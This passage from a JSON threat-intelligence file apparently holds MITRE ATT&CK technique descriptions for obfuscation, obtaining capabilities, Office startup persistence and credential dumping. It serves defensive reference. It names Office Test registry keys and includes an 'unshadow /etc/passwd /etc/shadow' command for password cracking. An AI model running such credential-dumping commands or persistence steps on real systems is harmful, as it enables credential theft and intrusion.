[PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.[[McAfee Malicious Doc Targets Pyeongchang Olympics](https://app.tidalcyber.com/references/e6b5c261-86c1-4b6b-8a5e-c6a454554588)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.003" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "f22d0738-dcb7-40c2-99cf-b426ac54224a", + "value": "Steganography" + }, + { + "description": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.[[Mandiant golang stripped binaries explanation](https://app.tidalcyber.com/references/60eb0109-9655-41ab-bf76-37b17bf9594a)][[intezer stripped binaries elf files 2018](https://app.tidalcyber.com/references/2d1faa93-fed5-4b0d-b6c9-72bbc4782201)]\n\nAdversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1027.008" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "018381a5-df0a-4636-9df2-294101fb2092", + "value": "Stripped Payloads" + }, + { + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920) for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. [[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)] Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. [[Linux/Cdorked.A We Live Security Analysis](https://app.tidalcyber.com/references/f76fce2e-2884-4b50-a7d7-55f08b84099c)] Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. [[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]\n\nAdversaries may also abuse [Command Obfuscation](https://app.tidalcyber.com/technique/d8406198-626c-5659-945e-2b5105fcd0c9) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. [[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)] [[FireEye Revoke-Obfuscation July 2017](https://app.tidalcyber.com/references/e03e9d19-18bb-4d28-8c96-8c1cef89a20b)][[PaloAlto EncodedCommand March 2017](https://app.tidalcyber.com/references/069ef9af-3402-4b13-8c60-b397b0b0bfd7)] ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "8352a63b-7450-4946-93c9-b7434935d794", + "type": "similar" + }, + { + "dest-uuid": "d8406198-626c-5659-945e-2b5105fcd0c9", + "type": "similar" + }, + { + "dest-uuid": "bd52a415-2b7a-4048-84bf-b20f385b357e", + "type": "similar" + }, + { + "dest-uuid": "9ef0ef16-b62c-4d09-b872-12c7e6adf2ed", + "type": "similar" + }, + { + "dest-uuid": "81564f1d-9c72-4d03-8561-b0d255f76c5f", + "type": "similar" + }, + { + "dest-uuid": "c41cb2d3-ff4c-5ee7-99b9-8a3d7987c9bf", + "type": "similar" + }, + { + "dest-uuid": "f216978a-36c0-47f1-a4ad-5ef67c8ae72c", + "type": "similar" + }, + { + "dest-uuid": "2507fbbc-ea9e-4e18-9329-b728847d7462", + "type": "similar" + }, + { + "dest-uuid": "e2911337-76ed-5834-b621-bb2b9a4205ee", + "type": "similar" + }, + { + "dest-uuid": "9ed5db23-3b2a-4a08-8602-bc8dff5c80f0", + "type": "similar" + }, + { + "dest-uuid": "f22d0738-dcb7-40c2-99cf-b426ac54224a", + "type": "similar" + }, + { + "dest-uuid": "018381a5-df0a-4636-9df2-294101fb2092", + "type": "similar" + } + ], + "uuid": "046cc07e-8700-4536-9c5b-6ecb384f52b0", + "value": "Obfuscated Files or Information" + }, + { + "description": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)] Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1588.003" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "8bdeddbe-14aa-412a-883a-7d6fe286c60e", + "value": "Code Signing Certificates" + }, + { + "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or even enabling [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://app.tidalcyber.com/technique/3a956db0-a3f0-442a-a981-db2ee20d60b2)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.[[DiginotarCompromise](https://app.tidalcyber.com/references/3c9b7b9a-d30a-4865-a96c-6e68d9e20452)] Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.[[Let's Encrypt FAQ](https://app.tidalcyber.com/references/96e1ccb9-bd5c-4716-8848-4c30e6eac4ad)]\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://app.tidalcyber.com/technique/0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b)) on infrastructure under their control.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1588.004" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58", + "value": "Digital Certificates" + }, + { + "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.[[Exploit Database](https://app.tidalcyber.com/references/38f7b3ea-9959-4dfb-8216-a745d071e7e2)][[TempertonDarkHotel](https://app.tidalcyber.com/references/4de7960b-bd62-452b-9e64-b52a0d580858)][[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)]\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.[[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)][[Wired SandCat Oct 2019](https://app.tidalcyber.com/references/5f28adee-1313-48ec-895c-27341bd1071f)] In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).[[TempertonDarkHotel](https://app.tidalcyber.com/references/4de7960b-bd62-452b-9e64-b52a0d580858)]\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609), [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391), [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef), [Exploitation of Remote Services](https://app.tidalcyber.com/technique/51ff4ada-8a71-4801-9cb8-a6e216eaa4e4), and [Application or System Exploitation](https://app.tidalcyber.com/technique/2109de05-5b45-4519-94a2-6c04f7d88286)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1588.005" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "8842e2e3-c4f8-446b-821b-5930cb15d30c", + "value": "Exploits" + }, + { + "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1588.001" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "49c73c13-2281-45d3-af26-ad52a1cecb7a", + "value": "Malware" + }, + { + "description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.[[Recorded Future Beacon 2019](https://app.tidalcyber.com/references/4e554042-53bb-44d4-9acc-44c86329ac47)]\n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1588.002" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "755c1883-4046-446b-a76a-88a842dd1c2c", + "value": "Tool" + }, + { + "description": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.[[National Vulnerability Database](https://app.tidalcyber.com/references/9b42dcc6-a39c-4d74-adc3-135f9ceac5ba)]\n\nAn adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://app.tidalcyber.com/technique/8842e2e3-c4f8-446b-821b-5930cb15d30c)) or to attempt to develop one themselves (i.e. [Exploits](https://app.tidalcyber.com/technique/5a57d258-0b23-431b-b50e-3150d2c0e52c)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1588.006" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "fe96475a-3090-449d-91fd-ae73cb4d9c7c", + "value": "Vulnerabilities" + }, + { + "description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.[[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)][[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)]\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.[[DiginotarCompromise](https://app.tidalcyber.com/references/3c9b7b9a-d30a-4865-a96c-6e68d9e20452)]", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + }, + { + "dest-uuid": "8bdeddbe-14aa-412a-883a-7d6fe286c60e", + "type": "similar" + }, + { + "dest-uuid": "4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58", + "type": "similar" + }, + { + "dest-uuid": "8842e2e3-c4f8-446b-821b-5930cb15d30c", + "type": "similar" + }, + { + "dest-uuid": "49c73c13-2281-45d3-af26-ad52a1cecb7a", + "type": "similar" + }, + { + "dest-uuid": "755c1883-4046-446b-a76a-88a842dd1c2c", + "type": "similar" + }, + { + "dest-uuid": "fe96475a-3090-449d-91fd-ae73cb4d9c7c", + "type": "similar" + } + ], + "uuid": "a6740db8-10d6-4e5b-986b-7695d3fc4b85", + "value": "Obtain Capabilities" + }, + { + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. [[Microsoft Office Add-ins](https://app.tidalcyber.com/references/99b20e30-76a8-4108-84ae-daf92058b44b)] There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. [[MRWLabs Office Persistence Add-ins](https://app.tidalcyber.com/references/a5b6ab63-0e6f-4789-a017-ceab1719ed85)][[FireEye Mail CDS 2018](https://app.tidalcyber.com/references/0af1795c-9cdd-43fa-8184-73f33d9f5366)]\n\nAdd-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1137.006" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "ecca6c85-3d18-40c0-84d0-d5fb7ebd72b5", + "value": "Add-ins" + }, + { + "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. [[Microsoft Change Normal Template](https://app.tidalcyber.com/references/76bf3ce1-b94c-4b3d-9707-aca8a1ae5555)]\n\nOffice Visual Basic for Applications (VBA) macros [[MSDN VBA in Office](https://app.tidalcyber.com/references/9c44416d-1f3d-4d99-b497-4615ed6f5546)] can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.[[enigma0x3 normal.dotm](https://app.tidalcyber.com/references/b8339d48-699d-4043-8197-1f0435a8dca5)][[Hexacorn Office Template Macros](https://app.tidalcyber.com/references/7d558a35-a5c0-4e4c-92bf-cb2435c41a95)] Shared templates may also be stored and pulled from remote locations.[[GlobalDotName Jun 2019](https://app.tidalcyber.com/references/f574182a-5d91-43c8-b560-e84a7e941c96)] \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.[[GlobalDotName Jun 2019](https://app.tidalcyber.com/references/f574182a-5d91-43c8-b560-e84a7e941c96)] \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1137.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "83a2facf-84e7-4a3c-9dcd-74c4fd33fec6", + "value": "Office Template Macros" + }, + { + "description": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.[[Hexacorn Office Test](https://app.tidalcyber.com/references/60d90852-ea00-404d-b613-9ad1589aff31)][[Palo Alto Office Test Sofacy](https://app.tidalcyber.com/references/3138f32c-f89c-439c-a8c5-2964c356308d)]\n\nThere exist user and global Registry keys for the Office Test feature:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf\n\nAdversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1137.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "62c22cc4-5643-4679-a6ae-9f6a3147d2fe", + "value": "Office Test" + }, + { + "description": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.[[SensePost Outlook Forms](https://app.tidalcyber.com/references/5d91a713-2f05-43bd-9fef-aa3f51f4c45a)]\n\nOnce malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.[[SensePost Outlook Forms](https://app.tidalcyber.com/references/5d91a713-2f05-43bd-9fef-aa3f51f4c45a)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1137.003" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "6fe2a6b8-bfb3-431d-8156-b2d005096f90", + "value": "Outlook Forms" + }, + { + "description": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.[[SensePost Outlook Home Page](https://app.tidalcyber.com/references/d2758a4b-d326-45a7-9ebf-03efcd1832da)]\n\nOnce malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.[[SensePost Outlook Home Page](https://app.tidalcyber.com/references/d2758a4b-d326-45a7-9ebf-03efcd1832da)]\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1137.004" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "12d918e0-51f7-45cf-b67c-fa60d15599f2", + "value": "Outlook Home Page" + }, + { + "description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.[[SilentBreak Outlook Rules](https://app.tidalcyber.com/references/a2ad0658-7c12-4f58-b7bf-6300eacb4a8f)]\n\nOnce malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.[[SilentBreak Outlook Rules](https://app.tidalcyber.com/references/a2ad0658-7c12-4f58-b7bf-6300eacb4a8f)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1137.005" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "d595e757-da2e-4430-95d6-81f7d69738e8", + "value": "Outlook Rules" + }, + { + "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.[[SensePost Ruler GitHub](https://app.tidalcyber.com/references/aa0a1508-a872-4e69-bf20-d3c8202f18c1)] These persistence mechanisms can work within Outlook or be used through Office 365.[[TechNet O365 Outlook Rules](https://app.tidalcyber.com/references/c7f9bd2f-254a-4254-8a92-a3ab02455fcb)]", + "meta": { + "platforms": [ + "Office 365", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "ecca6c85-3d18-40c0-84d0-d5fb7ebd72b5", + "type": "similar" + }, + { + "dest-uuid": "83a2facf-84e7-4a3c-9dcd-74c4fd33fec6", + "type": "similar" + }, + { + "dest-uuid": "62c22cc4-5643-4679-a6ae-9f6a3147d2fe", + "type": "similar" + }, + { + "dest-uuid": "6fe2a6b8-bfb3-431d-8156-b2d005096f90", + "type": "similar" + }, + { + "dest-uuid": "12d918e0-51f7-45cf-b67c-fa60d15599f2", + "type": "similar" + }, + { + "dest-uuid": "d595e757-da2e-4430-95d6-81f7d69738e8", + "type": "similar" + } + ], + "uuid": "db846575-a79b-4403-870d-5842be82001d", + "value": "Office Application Startup" + }, + { + "description": "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.[[Microsoft - Cached Creds](https://app.tidalcyber.com/references/590ea63f-f800-47e4-8d39-df11a184ba84)]\n\nOn Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.[[PassLib mscache](https://app.tidalcyber.com/references/ce40e997-d04b-49a6-8838-13205c54243a)] The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) to recover the plaintext password.[[ired mscache](https://app.tidalcyber.com/references/5b643e7d-1ace-4517-88c2-96115cac1209)]\n\nWith SYSTEM access, the tools/utilities such as [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16), [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532), and secretsdump.py can be used to extract the cached credentials.\n\nNote: Cached credentials for Windows Vista are derived using PBKDF2.[[PassLib mscache](https://app.tidalcyber.com/references/ce40e997-d04b-49a6-8838-13205c54243a)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1003.005" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "cf4d8bb4-2d60-499d-b72c-4957660758c9", + "value": "Cached Domain Credentials" + }, + { + "description": "Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)[[Microsoft DRSR Dec 2017](https://app.tidalcyber.com/references/43b75a27-7875-4c24-b04d-54e1b60f3028)] [[Microsoft GetNCCChanges](https://app.tidalcyber.com/references/410570e4-b578-4838-a25d-f03d92fcf3cb)] [[Samba DRSUAPI](https://app.tidalcyber.com/references/79e8f598-9962-4124-b884-eb10f86885af)] [[Wine API samlib.dll](https://app.tidalcyber.com/references/d0fdc669-959c-42ed-be5d-386a4e90a897)] to simulate the replication process from a remote domain controller using a technique called DCSync.\n\nMembers of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data[[ADSecurity Mimikatz DCSync](https://app.tidalcyber.com/references/61b0bb42-2ed6-413d-b331-0a84df12a87d)] from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) for use in [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a)[[Harmj0y Mimikatz and DCSync](https://app.tidalcyber.com/references/2afa76c1-caa1-4f16-9289-7abc7eb3a102)] or change an account's password as noted in [Account Manipulation](https://app.tidalcyber.com/technique/65f7482c-485b-4fd7-80f5-0ec6e923ac4d).[[InsiderThreat ChangeNTLM July 2017](https://app.tidalcyber.com/references/3bf24c68-fc98-4143-9dff-f54030c902fe)]\n\nDCSync functionality has been included in the \"lsadump\" module in [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16).[[GitHub Mimikatz lsadump Module](https://app.tidalcyber.com/references/e188ff4d-a983-4f5a-b9e1-3b0f9fd8df25)] Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.[[Microsoft NRPC Dec 2017](https://app.tidalcyber.com/references/05cf36a3-ff04-4437-9209-376e9f27c009)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1003.006" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "0a54e0f9-27eb-466b-ae47-53216e6e8065", + "value": "DCSync" + }, + { + "description": "Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.[[Linux Password and Shadow File Formats](https://app.tidalcyber.com/references/7c574609-4b0d-44e7-adc3-8a3d67e10e9f)]\n\nThe Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:[[nixCraft - John the Ripper](https://app.tidalcyber.com/references/5e093b21-8bbd-4ad4-9fe2-cbb04207f1d3)] # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1003.008" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "ef7732d9-b629-4037-b5b5-579dafda080b", + "value": "/etc/passwd and /etc/shadow" + }, + { + "description": "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.[[Passcape LSA Secrets](https://app.tidalcyber.com/references/64b0e13f-de5f-4964-bcfa-bb0f6206383a)][[Microsoft AD Admin Tier Model](https://app.tidalcyber.com/references/3afba81a-3b1d-41ec-938e-24f055698d52)][[Tilbury Windows Credentials](https://app.tidalcyber.com/references/2ddae0c9-910c-4c1a-b524-de3a58dbba13)] LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets. LSA secrets can also be 